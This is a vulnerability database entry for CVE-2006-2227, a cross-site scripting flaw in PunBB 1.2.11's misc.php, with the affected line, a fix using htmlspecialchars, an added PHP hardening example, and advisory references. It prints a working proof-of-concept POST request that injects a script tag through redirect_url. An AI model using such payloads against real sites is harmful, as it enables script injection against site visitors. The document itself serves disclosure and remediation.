PunBB misc.php Cross-Site Scripting (XSS) Vulnerability

Vulnerability ID: 1195105    Vulnerability type: Cross-site scripting
Published: 2006-05-05    Updated: 2006-05-09
CVE ID: CVE-2006-2227    CNNVD-ID: CNNVD-200605-105
Platform: N/A    CVSS score: 4.3
|Vulnerability source
https://cxsecurity.com/issue/WLB-2006050046
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-105
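|Vulnerability details
misc.php in PunBB 1.2.11 contains a cross-site scripting (XSS) vulnerability. A remote attacker can inject arbitrary web script or HTML via the req_message parameter, because the redirect_url parameter is not sanitized.
|Exploit
PunBB 1.2.11 Cross-Site Scripting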

File name :- misc.php

Action    :- Send Email

Line      :- 123

[php]

redirect($_POST['redirect_url'], $lang_misc['E-mail sent redirect']);

[/php]

The $_POST['redirect_url'] = Unfiltered Input

Exploit :-

Send POST Request

[code]

GET :-

/PunBB/misc.php?email=2

POST :-

form_sent=1&redirect_url=index.php&req_subject=test&req_message=test"><script>alert(1);</script>

[/code]

Fix :-

Replace The Line With :-

[php]

redirect(htmlspecialchars($_POST['redirect_url']), $lang_misc['E-mail sent redirect']);

[/php]
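
Added example, not part of the original advisory and not PunBB's own code: it shows the escaping fix above at the point where a redirect target is written into HTML, and goes one step further by first restricting the target to a same-site relative path. The functions render_redirect_page(), safe_redirect_target() and hardened_redirect_page() are hypothetical names, the sample inputs are constructed, and the example assumes the redirect helper places the URL inside a double-quoted HTML attribute.

```php
<?php
// Added example. render_redirect_page() is a hypothetical stand-in for a
// redirect() helper that writes the destination into HTML; it is not PunBB code.
function render_redirect_page(string $url, string $message): string
{
    return '<meta http-equiv="refresh" content="2;URL=' . $url . '">' . "\n"
         . '<p>' . $message . ' <a href="' . $url . '">Continue</a></p>' . "\n";
}

// Step 1: allow only a same-site relative path. The allowlist has no quote,
// angle bracket, colon, backslash or whitespace, so the value cannot carry
// markup or a URL scheme; a leading "//" (another host) is rejected as well.
function safe_redirect_target(string $raw, string $fallback = 'index.php'): string
{
    if (!preg_match('/\A[A-Za-z0-9_.\/?&=%#-]+\z/', $raw)) {
        return $fallback;
    }
    if (substr($raw, 0, 2) === '//') {
        return $fallback;
    }
    return $raw;
}

// Step 2: escape for the HTML attribute context at the point of output.
function hardened_redirect_page(string $raw, string $message): string
{
    $target = safe_redirect_target($raw);
    return render_redirect_page(
        htmlspecialchars($target, ENT_QUOTES, 'UTF-8'),
        htmlspecialchars($message, ENT_QUOTES, 'UTF-8')
    );
}

// Constructed sample values standing in for $_POST['redirect_url'].
$samples = [
    'viewtopic.php?id=5&p=2',
    'index.php"><script>alert(1);</script>',
    '//other-host.example/',
];

foreach ($samples as $raw) {
    $before = render_redirect_page($raw, 'E-mail sent.');
    $after  = hardened_redirect_page($raw, 'E-mail sent.');
    printf("input: %s\n", $raw);
    printf("  raw markup in unescaped page: %s\n", strpos($before, '<script>') !== false ? 'yes' : 'no');
    printf("  raw markup in hardened page:  %s\n", strpos($after, '<script>') !== false ? 'yes' : 'no');
    echo $after, "\n";
}
```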
|References

Source: BUGTRAQ
Name: 20060503 PunBB 1.2.11 Cross-Site Scripting
Link: http://www.securityfocus.com/archive/1/archive/1/432950/100/0/threaded
Source: SECUNIA
Name: 19986
Link: http://secunia.com/advisories/19986
Source: XF
Name: punbb-misc-xss(26245)
Link: http://xforce.iss.net/xforce/xfdb/26245
Source: BID
Name: 17827
Link: http://www.securityfocus.com/bid/17827
Source: www.punbb.org
Link: http://www.punbb.org/download/hdiff/hdiff-1.2.11_to_1.2.12.html
Source: www.punbb.org
Link: http://www.punbb.org/changelogs/1.2.11_to_1.2.12.txt
Source: OSVDB
Name: 25256
Link: http://www.osvdb.org/25256
Source: VUPEN
Name: ADV-2006-1670
Link: http://www.frsirt.com/english/advisories/2006/1670
Source: SREASON
Name: 849
Link: http://securityreason.com/securityalert/849